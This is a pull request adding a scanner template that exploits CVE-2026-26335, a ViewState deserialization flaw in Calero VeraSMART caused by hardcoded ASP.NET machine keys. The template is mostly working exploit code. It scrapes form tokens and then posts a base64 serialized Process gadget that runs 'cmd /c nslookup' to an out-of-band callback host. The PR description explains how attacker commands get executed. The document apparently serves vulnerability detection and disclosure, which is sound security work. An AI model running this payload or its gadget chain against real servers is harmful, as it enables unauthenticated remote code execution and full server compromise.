### PR TITLE
Add CVE-2026-26335 - Calero VeraSMART ViewState Deserialization RCE

### DIFF
--- a/http/cves/2026/CVE-2026-26335.yaml
+++ b/http/cves/2026/CVE-2026-26335.yaml
@@ -1,0 +1,84 @@
+id: CVE-2026-26335
+
+info:
+  name: Calero VeraSMART - ViewState Deserialization RCE
+  author: Bushi-gg
+  severity: critical
+  description: |
+    Calero VeraSMART versions prior to 2022 R1 use static hardcoded ASP.NET machineKey values.
+    An attacker who obtains these keys can craft a valid ASP.NET ViewState payload that passes
+    integrity validation, resulting in server-side deserialization and remote code execution.
+    This template attempts exploitation by sending a crafted ViewState payload with DNS callback.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-26335
+    - https://www.vulncheck.com/advisories/calero-verasmart-2022-r1-static-iis-machine-keys-enable-viewstate-rce
+    - https://github.com/mbanyamer/CVE-2026-26335-Calero-VeraSMART-RCE
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-26335
+    cwe-id: CWE-321
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: calero
+    product: verasmart
+  tags: cve,cve2026,calero,verasmart,rce,deserialization,viewstate,oob,interactsh
+
+variables:
+  callback: "{{interactsh-url}}"
+
+http:
+  - raw:
+      - |
+        GET /Login.aspx HTTP/1.1
+        Host: {{Hostname}}
+        
+      - |
+        GET /Default.aspx HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST {{endpoint}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        
+        __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{payload}}&__VIEWSTATEGENERATOR={{generator}}&__EVENTVALIDATION={{eventval}}
+
+    payloads:
+      endpoint:
+        - "/Login.aspx"
+        - "/Default.aspx"
+      payload:
+        - "/wEyhwEAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADWBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBuc2xvb2t1cCAle2NhbGxiYWNrfSIgU3RhbmRhcmRFcnJvckVuY29kaW5nPSJ7eDpOdWxsfSIgU3RhbmRhcmRPdXRwdXRFbmNvZGluZz0ie3g6TnVsbH0iIFVzZXJOYW1lPSIiIFBhc3N3b3JkPSJ7eDpOdWxsfSIgRG9tYWluPSIiIExvYWRVc2VyUHJvZmlsZT0iRmFsc2UiIEZpbGVOYW1lPSJjbWQiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4L"
+
+    req-condition: true
+    
+    extractors:
+      - type: regex
+        name: generator
+        part: body_1
+        internal: true
+        regex:
+          - '__VIEWSTATEGENERATOR" value="([A-F0-9]+)"'
+        
+      - type: regex
+        name: eventval
+        part: body_1
+        internal: true
+        regex:
+          - '__EVENTVALIDATION" value="([^"]+)"'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_1
+        words:
+          - "VeraSMART"
+          - "__VIEWSTATE"
+        condition: and
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"


### PR DESCRIPTION
## Description
This template detects and exploits CVE-2026-26335, a critical ViewState deserialization vulnerability in Calero VeraSMART that enables unauthenticated remote code execution.

## Vulnerability Details
- **CVE:** CVE-2026-26335
- **CVSS:** 9.8 (Critical)
- **Type:** ViewState Deserialization → RCE
- **Affected:** Calero VeraSMART < 2022 R1
- **CWE:** CWE-321 (Use of Hard-coded Cryptographic Key)

## How It Works
Calero VeraSMART uses static hardcoded ASP.NET machineKey values. An attacker can craft a valid ViewState payload signed with these known keys. When the server deserializes the payload, it executes embedded XAML/Process objects containing attacker commands.

The template:
1. Retrieves __VIEWSTATEGENERATOR and __EVENTVALIDATION from the login page
2. Crafts a malicious ViewState payload containing a System.Diagnostics.Process object
3. Injects an nslookup command that calls back to interactsh for DNS verification
4. Waits for DNS callback to confirm successful command execution

## Impact
- Unauthenticated remote code execution
- Full server compromise
- Attackers can execute arbitrary commands in the context of the web application

## References
- https://github.com/mbanyamer/CVE-2026-26335-Calero-VeraSMART-RCE
- https://www.vulncheck.com/advisories/calero-verasmart-2022-r1-static-iis-machine-keys-enable-viewstate-rce
- https://nvd.nist.gov/vuln/detail/CVE-2026-26335

## Testing
Uses interactsh OOB DNS callback to verify successful RCE without destructive payloads.